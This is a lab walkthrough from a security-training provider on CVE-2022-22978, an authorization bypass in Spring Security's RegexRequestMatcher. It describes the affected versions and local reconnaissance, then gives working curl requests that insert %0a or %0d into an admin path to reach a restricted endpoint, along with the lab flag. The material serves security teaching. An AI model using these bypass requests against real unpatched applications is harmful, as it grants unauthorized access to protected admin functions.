Resources
    [CVE-2022–22978]: Authori ...
    10 November 22

    [CVE-2022–22978]: Authorization Bypass in RegexRequestMatcher

    Posted byINE
    facebooktwitterlinkedin
    news-featured

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Introduction

    What is Spring Security?

    Spring Security is a powerful and highly customizable authentication and access-control framework. It is the de-facto standard for securing Spring-based applications.

    Spring Security is a framework that focuses on providing both authentication and authorization to Java applications. Like all Spring projects, the real power of Spring Security is found in how easily it can be extended to meet custom requirements.

    Reference: https://spring.io/projects/spring-security

    Authorization Bypass in RegexRequestMatcher (CVE-2022–22978)

    In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers. Applications using RegexRequestMatcher with . in the regular expression are possibly vulnerable to an authorization bypass.

    Reference: https://nvd.nist.gov/vuln/detail/CVE-2022-22978

    NVD has assigned a base score of 9.8 (Critical) to this vulnerability!

    The vulnerability

    Applications using RegexRequestMatcher with a regular expression that contains . (as well as *) are likely vulnerable to an authorization bypass for versions:

    • Spring Security

    • 5.5.x prior to 5.5.7

    • 5.6.x prior to 5.6.4

    • Earlier unsupported versions

    Reference: https://tanzu.vmware.com/security/cve-2022-22978

    Lab Environment

    In this lab environment, the user is going to get access to a low-privileged user in an Ubuntu CLI instance. The root user on the same Ubuntu instance is hosting an application leveraging Spring Security that is vulnerable to CVE-2022–22978and is accessible from the tools installed on the Ubuntu machine at http://127.0.0.1:8080.

    Objective: Exploit the authorization bypass in RegexRequestMatcher, in the vulnerable Spring Security-based application to access the restricted endpoint — /admin/index.

    1.png

    https://my.ine.com/CyberSecurity/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/24fe9c5e-582f-4495-b8aa-20f3ddaf9770

    Acknowledgments

    The setup code is based on the following GitHub repository:

    Tools

    The best tools for this lab are:

    • cURL

    • Nmap

    Solution

    Step 1: Scan the machine for open ports using Nmap.

    Once the lab link is opened, you should have access to an Ubuntu CLI instance.

    Run the following command to scan the machine for open ports:

    Command:

    nmap 127.0.0.1

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-1.png

    Port 8080 is open!

    Step 2: Check the running processes and listening connections list.

    List the running processes:

    Command:

    ps aux

     authorization-bypass-in-regex-request-matcher-cve-2022-22978-2.png

    Notice the java process is running with root privileges.

    Check the complete line for that process entry (we could have checked the /proc//cmdline file as well):

    Command:

    ps aux > out

    cat out

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-2_1.png

    It is a Spring Security-based application.

    Check for the active listening TCP ports:

    Command:

    ss -pant

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-2_2.png

    Port 8080 seems to be the only candidate on which the Spring Security-based application might be listening.

    This can be confirmed by sending a curl request to the available candidate ports.

    Step 3: Send a request to the Java application on port 8080.

    Command:

    curl http://127.0.0.1:8080

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-3.png

    Notice one link in the response: /admin/index.

    Request contents for that link:

    Command:

    curl http://127.0.0.1:8080/admin/index

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-3_1.png

    The response says forbidden. It must be a route accessible to authenticated users.

    Step 4: Search for Spring Cloud Authorization bypass exploits.

    Search Query:

    spring security authorization bypass

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-4.png

    As stated on Snyk’s website:

    org.springframework.security:spring-security-web is a package within Spring Security that provides security services for the Spring IO Platform.

    Affected versions of this package are vulnerable to Authorization Bypass via the RegexRequestMatcher class, which can easily be misconfigured to be bypassed on some servlet containers when it is used with . in the regular expression.

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-4_1.png

    Check the PoC link:

    URL: https://github.com/ducluongtran9121/CVE-2022-22978-PoC

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-4_2.png

    On this page, the exploit for the regexMatcher is listed:

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-4_3.png

    We can supply %0a or %0d in the URI to bypass the authorization checks and access the restricted endpoint!

    Step 5: Exploit CVE-2022–22978 to bypass the enforced authorization checks.

    Send the following curl request to bypass the authorization checks:

    Command:

    curl http://127.0.0.1:8080/admin/%0aindex

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-5.png

    The flag is retrieved back in the response:

    Flag: 23e0520ade6129343e4c1d9fd63120ea

    Alternatively, send the following request to bypass the authorization checks:

    Command:

    curl http://127.0.0.1:8080/admin/%0dindex

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-5_1.png

    Curious readers can try these requests as well to bypass the authorization:

    Command:

    curl http://127.0.0.1:8080/admin/index%0a

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-5_2.png

    Command:

    curl http://127.0.0.1:8080/admin/index%0d

    authorization-bypass-in-regex-request-matcher-cve-2022-22978-5_3.png

    With that, we conclude this lab on authorization bypass in RegexRequestMatcher in Spring Security-based applications.

    References

    Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    © 2024 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo